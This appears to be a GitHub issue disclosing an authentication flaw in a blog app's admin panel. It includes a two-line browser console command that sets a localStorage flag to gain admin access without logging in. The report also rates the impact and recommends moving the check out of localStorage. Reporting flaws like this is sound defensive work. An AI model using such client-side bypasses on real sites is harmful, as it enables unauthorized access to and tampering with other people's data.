FluxxyBoi
commented
2 months ago window.localStorage.setItem("DidAdminLogInOnThisSystem", "TRUE");
window.location.href = "/admin/";Console command to login into admin panel.
Open FluxxyBoi opened 2 months ago
FluxxyBoi
commented
2 months ago window.localStorage.setItem("DidAdminLogInOnThisSystem", "TRUE");
window.location.href = "/admin/";Console command to login into admin panel.
Description of the Vulnerability
Manually setting "DidAdminLogInOnThisSystem" to "true" from inspect element to gain unauthorized access. Allows anyone to delete, or edit anyone else's blogs.
Screen Shot of the Vulnerable Code
Impact of the vulnerability
5/5
Recommended Steps to resolve it?
Not store such information in localstorage.
School Name
GD Goenka, Sector 48.